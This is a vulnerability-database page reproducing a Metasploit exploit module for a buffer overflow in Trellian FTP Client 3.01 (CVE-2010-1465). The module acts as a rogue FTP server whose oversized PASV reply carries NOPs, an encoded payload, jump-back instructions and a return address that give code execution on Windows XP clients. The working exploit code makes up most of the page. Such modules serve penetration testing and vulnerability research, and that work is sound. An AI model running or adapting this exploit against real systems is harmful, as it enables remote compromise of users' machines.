Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormZombiefxPACKETSTORM:88949
HistoryApr 27, 2010 - 12:00 a.m.

Trellian FTP Client 3.01 PASV Remote Buffer Overflow

2010-04-2700:00:00
zombiefx
packetstormsecurity.com
15

0.495 Medium

EPSS

Percentile

97.5%

JSON
`##  
# $Id: trellian_client_pasv.rb 9143 2010-04-26 18:56:46Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::TcpServer  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',  
'Description' => %q{  
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered   
through an excessively long PASV message.  
},  
'Author' =>  
[  
'zombiefx', # Original exploit author  
'dookie' # MSF module author  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 9143 $',  
'References' =>  
[  
[ 'CVE', '2010-1465'],  
[ 'OSVDB', '63812'],  
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Payload' =>  
{  
'Space' => 900,  
'BadChars' => "\x00\x29\x2c\x2e",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe  
],  
'Privileged' => false,  
'DisclosureDate' => 'April 11 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),  
], self.class)  
end  
  
def on_client_connect(client)  
return if ((p = regenerate_payload(client)) == nil)  
  
# Let the client log in  
client.get_once  
  
user = "331 Please specify the password.\r\n"  
client.put(user)  
  
client.get_once  
pass = "230 Login successful.\r\n"  
client.put(pass)  
  
# Handle the clients PWD command  
client.get_once  
pwd = "257 \"/\" is current directory.\r\n"  
client.put(pwd)  
client.get_once  
  
sploit = "227 Entering Passive Mode ("  
sploit << rand_text_alpha_upper(2171)  
sploit << make_nops(100)  
sploit << payload.encoded  
sploit << make_nops(900 - (payload.encoded.length))  
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes  
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes  
sploit << [target.ret].pack("A3")  
sploit << ")\r\n"  
  
client.put(sploit)  
  
end  
  
end  
`

Related

openvas 2
cve 1
nvd 1
cvelist 1
prion 1
checkpoint_advisories 1
openvas
openvas
Trellian FTP 'PASV' Response Buffer Overflow Vulnerability
2010-04-29 00:00:00
Trellian FTP 'PASV' Response Buffer Overflow Vulnerability
2010-04-29 00:00:00
cve
cve
CVE-2010-1465
2010-04-16 19:30:00
nvd
nvd
CVE-2010-1465
2010-04-16 19:30:00
cvelist
cvelist
CVE-2010-1465
2010-04-16 19:00:00
prion
prion
Stack overflow
2010-04-16 19:30:00
checkpoint_advisories
checkpoint_advisories
Trellian FTP Client PASV Remote Buffer Overflow (CVE-2010-1465)
2016-10-26 00:00:00

0.495 Medium

EPSS

Percentile

97.5%

JSON
Related for PACKETSTORM:88949
openvas2cve1nvd1cvelist1prion1checkpoint_advisories1